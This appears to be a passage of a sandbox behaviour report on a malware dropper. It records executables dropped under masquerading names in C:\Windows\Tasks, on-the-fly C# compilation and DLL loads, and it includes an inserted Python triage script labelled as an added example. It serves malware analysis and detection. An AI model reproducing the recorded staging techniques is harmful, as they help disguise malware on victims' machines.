Source: C:\ProgramData\migrate.exe  Section loaded: textshaping.dll
Source: C:\ProgramData\migrate.exe  Section loaded: textinputframework.dll
Source: C:\ProgramData\migrate.exe  Section loaded: coreuicomponents.dll
Source: C:\ProgramData\migrate.exe  Section loaded: coremessaging.dll
Source: C:\ProgramData\migrate.exe  Section loaded: ntmarta.dll
Source: C:\ProgramData\migrate.exe  Section loaded: wintypes.dll
Source: C:\ProgramData\migrate.exe  Section loaded: wintypes.dll
Source: C:\ProgramData\migrate.exe  Section loaded: wintypes.dll
Source: C:\ProgramData\migrate.exe  Section loaded: windows.storage.dll
Source: C:\ProgramData\migrate.exe  Section loaded: wldp.dll
Source: C:\ProgramData\migrate.exe  Section loaded: propsys.dll
Source: C:\ProgramData\migrate.exe  Section loaded: profapi.dll
Source: C:\ProgramData\migrate.exe  Section loaded: edputil.dll
Source: C:\ProgramData\migrate.exe  Section loaded: urlmon.dll
Source: C:\ProgramData\migrate.exe  Section loaded: iertutil.dll
Source: C:\ProgramData\migrate.exe  Section loaded: srvcli.dll
Source: C:\ProgramData\migrate.exe  Section loaded: netutils.dll
Source: C:\ProgramData\migrate.exe  Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\migrate.exe  Section loaded: appresolver.dll
Source: C:\ProgramData\migrate.exe  Section loaded: bcp47langs.dll
Source: C:\ProgramData\migrate.exe  Section loaded: slc.dll
Source: C:\ProgramData\migrate.exe  Section loaded: userenv.dll
Source: C:\ProgramData\migrate.exe  Section loaded: sppc.dll
Source: C:\ProgramData\migrate.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\migrate.exe  Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\migrate.exe  Section loaded: pcacli.dll
Source: C:\ProgramData\migrate.exe  Section loaded: mpr.dll
                                  Source: C:\ProgramData\migrate.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\Wmiic.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Tasks\Wmiic.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\Wmiic.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: wsock32.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: winmm.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: mpr.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: wininet.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Tasks\IntelConfigService.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Tasks\Wrap.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: napinsp.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: pnrpnsp.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: wshbth.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: nlaapi.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: winrnr.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Tasks\ApplicationsFrameHost.exeSection loaded: explorerframe.dll
                                  Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: wsock32.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: winmm.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: mpr.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: wininet.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\Tasks\Superfetch.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: dxgidebug.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: sfc_os.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: dwmapi.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: riched20.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: usp10.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: msls31.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: windowscodecs.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: textshaping.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: textinputframework.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: coreuicomponents.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: coremessaging.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: coremessaging.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: wldp.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: propsys.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: profapi.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: edputil.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: netutils.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: policymanager.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: msvcp110_win.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: slc.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: sppc.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: pcacli.dll
                                  Source: C:\Windows\Tasks\1.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: version.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: vcruntime140.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: libffi-7.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: powrprof.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: pdh.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: python3.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: umpdc.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: wtsapi32.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: libcrypto-1_1.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: libssl-1_1.dll
                                  Source: C:\Windows\Tasks\MSTask.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: apphelp.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: version.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: wldp.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: profapi.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: ktmw32.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: amsi.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: userenv.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: propsys.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: dlnashext.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: wpdshext.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: edputil.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: netutils.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: wintypes.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: appresolver.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: bcp47langs.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: slc.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: sppc.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\Windows\Bridgeprovider.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
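The "Section loaded" rows above are raw image-load events; what makes them useful is grouping them per process and asking two questions: where does the process run from, and which loaded DLLs give away what it really is (MSTask.exe in C:\Windows\Tasks pulling in python3.dll and libssl-1_1.dll is a packaged Python program, Bridgeprovider.exe loading mscoree.dll and amsi.dll is managed code, and nothing in C:\Windows\Tasks or the C:\Windows root should be executing at all). The following triage script is an added example and is not part of the Joe Sandbox report or its tooling. The sample rows are copied from the report; the suspicious-directory list, the DLL hint table and the "location or at least two hints" reporting rule are this example's own assumptions.

```python
"""Per-process triage of 'Section loaded' rows from a sandbox behaviour log.

Added example, not Joe Sandbox code. Rows are matched whether the extractor kept
a separator between the image path and 'Section loaded:' or fused them.
"""
import re
from collections import defaultdict

# Constructed input: a few rows taken from the report's own 'Section loaded' list.
SAMPLE_LOG = """\
Source: C:\\ProgramData\\migrate.exe  Section loaded: sfc_os.dll
Source: C:\\Windows\\Tasks\\MSTask.exe  Section loaded: python3.dll
Source: C:\\Windows\\Tasks\\MSTask.exe  Section loaded: libssl-1_1.dll
Source: C:\\Windows\\Tasks\\ApplicationsFrameHost.exeSection loaded: dnsapi.dll
Source: C:\\Windows\\Bridgeprovider.exe  Section loaded: mscoree.dll
Source: C:\\Windows\\Bridgeprovider.exe  Section loaded: amsi.dll
Source: C:\\Windows\\SysWOW64\\wscript.exe  Section loaded: amsi.dll
Source: C:\\Windows\\System32\\icacls.exe  Section loaded: ntmarta.dll
"""

ROW_RE = re.compile(r"^Source:\s*(?P<image>.+?\.exe)\s*Section loaded:\s*(?P<dll>\S+)$", re.I)

# Assumption: directories from which no legitimate executable should be running.
# C:\Windows\Tasks is the legacy scheduled-task folder; the C:\Windows root holds
# no normal user-launched executables.
SUSPICIOUS_DIRS = {"c:\\windows", "c:\\windows\\tasks", "c:\\programdata"}

# Assumption: DLLs whose presence characterises the process (hint table, not a verdict).
DLL_HINTS = {
    "python3.dll": "embedded CPython runtime (packaged Python program)",
    "libssl-1_1.dll": "bundled OpenSSL 1.1 instead of SChannel",
    "mscoree.dll": ".NET CLR host (managed code)",
    "amsi.dll": "script or .NET content scanned by AMSI",
    "sfc_os.dll": "Windows Resource Protection API",
    "dnsapi.dll": "name resolution (network activity expected)",
}


def parse_loads(text):
    """Return {image path: [dll, ...]} in load order, one entry per process image."""
    loads = defaultdict(list)
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            loads[m.group("image")].append(m.group("dll").lower())
    return dict(loads)


def location_reason(image):
    """Reason string if the image runs from a directory in SUSPICIOUS_DIRS, else None."""
    directory = image.lower().rsplit("\\", 1)[0]
    return f"executes from {directory}" if directory in SUSPICIOUS_DIRS else None


def triage(loads):
    """Return {image: [reason, ...]} for images that run from a suspicious directory
    or carry at least two DLL hints; a single hint alone (e.g. wscript.exe loading
    amsi.dll) is normal and is not reported."""
    findings = {}
    for image, dlls in loads.items():
        hints = [f"{d}: {DLL_HINTS[d]}" for d in dict.fromkeys(dlls) if d in DLL_HINTS]
        loc = location_reason(image)
        if loc or len(hints) >= 2:
            findings[image] = ([loc] if loc else []) + hints
    return findings


if __name__ == "__main__":
    for image, reasons in triage(parse_loads(SAMPLE_LOG)).items():
        print(image)
        for r in reasons:
            print("   -", r)
```

Run it against the full report export to get one block per dropped executable; the hint table is deliberately small, and a real deployment would extend it with the loads that matter in your environment (for this sample, libcrypto-1_1.dll, wininet.dll and winrnr.dll are obvious additions).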
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
Source: Window Recorder  Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: IYXE4Uz61k.exe  Static file information: File size 50529184 > 1048576
Source: IYXE4Uz61k.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IYXE4Uz61k.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IYXE4Uz61k.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IYXE4Uz61k.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IYXE4Uz61k.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IYXE4Uz61k.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IYXE4Uz61k.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: IYXE4Uz61k.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: IYXE4Uz61k.exe
Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: MSTask.exe, 00000038.00000003.1914851893.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_queue.pdb source: MSTask.exe, 00000038.00000003.1915801440.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdbGCTL source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_ssl.pdb source: _ssl.pyd.56.dr
Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: MSTask.exe, 00000038.00000003.1916048595.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\python3.pdb source: MSTask.exe, 00000038.00000003.1924711408.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp, MSTask.exe, 00000038.00000003.1924749647.00000286A4AC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: MSTask.exe, 00000038.00000003.1915475879.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.pdb source: Bridgeprovider.exe, 00000041.00000002.2009860535.0000000003C3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM  OpenSSL 1.1.1d 10 Sep 2019  built on: Mon Sep 16 11:00:37 2019 UTC  platform: VC-WIN64A-masm  OPENSSLDIR: "C:\Program Files\Common Files\SSL"  ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"  not available source: MSTask.exe, 0000003E.00000002.4153223643.00007FFDFB243000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: MSTask.exe, 00000038.00000003.1927571223.00000286A4AC9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: MSTask.exe, 0000003E.00000002.4153223643.00007FFDFB243000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: MSTask.exe, 00000038.00000003.1915593083.00000286A4AC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: MSTask.exe, 00000038.00000003.1927960487.00000286A4ACD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: kockv.pdb source: Bridgeprovider.exe, 00000041.00000002.2037973989.000000001BD19000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: vcruntime140.amd64.pdb source: MSTask.exe, 00000038.00000003.1914695345.00000286A4AC0000.00000004.00000020.00020000.00000000.sdmp
Source: IYXE4Uz61k.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IYXE4Uz61k.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IYXE4Uz61k.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IYXE4Uz61k.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IYXE4Uz61k.exe  Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Bridgeprovider.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
Source: C:\Windows\Bridgeprovider.exe  Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\214ckojv\214ckojv.cmdline"
Source: C:\Windows\Tasks\Wmiic.exe  Code function: 31_2_0000000140023A88 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 31_2_0000000140023A88
Source: C:\Users\user\Desktop\IYXE4Uz61k.exe  File created: C:\ProgramData\__tmp_rar_sfx_access_check_4306734
